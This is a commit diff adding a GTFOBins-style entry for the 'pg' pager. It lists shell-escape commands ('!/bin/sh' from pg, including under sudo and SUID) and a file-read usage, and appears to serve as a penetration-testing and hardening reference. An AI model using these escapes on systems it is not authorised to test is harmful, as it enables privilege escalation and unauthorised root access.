Add nice, cpulimit and pg
This commit is contained in:
17
_gtfobins/pg.md
Normal file
17
_gtfobins/pg.md
Normal file
@@ -0,0 +1,17 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
pg /etc/profile
|
||||
!/bin/sh
|
||||
file-read:
|
||||
- code: pg file_to_read
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo pg /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |
|
||||
./pg /etc/profile
|
||||
!/bin/sh
|
||||
---
|
||||
Reference in New Issue
Block a user